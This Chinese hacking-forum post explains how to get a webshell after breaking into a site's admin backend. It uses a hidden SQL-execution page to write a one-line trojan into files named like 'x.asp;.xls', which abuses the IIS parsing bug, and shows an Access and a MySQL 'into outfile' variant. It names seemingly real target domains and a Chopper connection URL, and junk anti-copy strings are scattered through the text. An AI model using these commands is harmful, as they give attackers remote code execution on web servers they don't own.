好不容易进了后台,发现啥上传啊。备份啊多木有。* W Z' } _7 t' K: S: [
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的/ V% h. H6 f ?6 Q2 O
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
- ^- V+ Y2 s. L% Y8 P2 u然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:0 `9 i. F0 D, `9 w' y; Z% m
1.create table cmd (a varchar(50))
+ l. Q `- u m) x# `6 H- M" f2.insert into cmd (a) values (‘‘)
7 J8 ?* d3 C. r7 e3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd: b7 \% o/ U7 e9 e" G5 s
(把表cmd的内容导出为物理路径的一个EXCEL文件)
; P1 Z2 I3 B0 M, \% e" b4.drop table cmd
& q# s4 m5 R) S# F! j0 }1 x0 A4 `利用IIS的BUG成功拿到了WEBSHELL。
# ? R) q1 |5 q1 E& @3 c+ x0 ^' l
( ]6 @* [( F$ ?) r2 V) A% a6 {直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话/ x9 x- O) U4 y( g+ n, C
. i$ \6 b3 F4 d! g' w: K+ k/ @8 [ SQL语句意思解释:8 I0 Z2 X" M; b+ j) ]
第一句
( ^" [$ Y/ r( ]5 R* k/ K! X% ? 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为504 ?& L8 {$ B9 O
7 R) }" s: I- y 第二句
" S8 E5 b3 J9 E; S 在表cmd的a字段插入一句话木马3 W% A# B9 t" Z, L5 I! N
第三句
" N/ `, N1 v- l% y& y( m( i 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 N# N3 K8 @" P$ j/ v) _' r$ N2 t
3 z' T7 `9 {0 M: t- i Z
第四句
/ }1 ]0 j! E1 U7 t, A, K 删除建立的cmd表
/ d- z# V- E2 P# W
0 z+ M4 w- c* v! n2 ?& G+ B6 y5 t0 M 以下内容为测试:
$ h# V) S; q- q3 D8 J Access利用后台SQL执行命令功能导出WebShell:
2 N' I# _4 k) g 这个更简单:* c! H4 @$ W6 r- O4 C
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
. d, H4 R9 `. g" d: d 或者+ H# w. h' P/ v, ]1 g* s
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]9 M! j7 k& T0 q; ?
2 Q; Z* I7 K- G( f e: R$ i
后台有执行SQL语句功能(vote为已知表段)0 A5 \, F. S1 O9 @- g
希望对大家有所帮助拿shell的又一个思路
* H2 X! D, I7 h |